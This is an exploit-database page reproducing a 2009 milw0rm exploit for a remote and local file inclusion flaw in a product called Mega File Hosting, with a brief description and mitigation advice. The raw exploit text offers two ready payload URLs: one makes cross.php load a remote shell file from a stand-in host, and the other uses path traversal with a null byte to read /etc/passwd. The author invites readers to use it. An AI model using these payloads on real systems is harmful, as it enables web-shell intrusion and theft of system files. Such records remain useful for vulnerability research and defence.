header-logo
Suggest Exploit
vendor:
N/A
by:
Garry
7.5
CVSS
HIGH
Remote/Local File Inclusion
98
CWE
Product Name: N/A
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Mega File Hosting || Remote/Local File inclusion

This exploit allows an attacker to include a remote file on the web server. The attacker can also include a local file on the web server by using a null byte injection. This vulnerability can be exploited by sending a specially crafted HTTP request containing the malicious URL to the vulnerable web server.

Mitigation:

The best way to mitigate this vulnerability is to restrict the file types that can be included in the web application. Additionally, the web application should also be configured to only allow files from a specific directory to be included.
Source

Exploit-DB raw data:

#####################################################
# Mega File Hosting || Remote/Local File inclusion #  
# For #  
# All Version #  
#####################################################

#############################################
Just addition This Exploit and enjoy #
#############################################

   
   
/cross.php?url=http://site.com/sh3ll.txt  
/cross.php?url=../../../.../../../../../etc/passwd%00  


#############################################
Author Garry /// 25/02/2009 # Www.Hacking.ge 
#############################################

# milw0rm.com [2009-03-17]

Navigation

Suggest Exploit

Services By CQR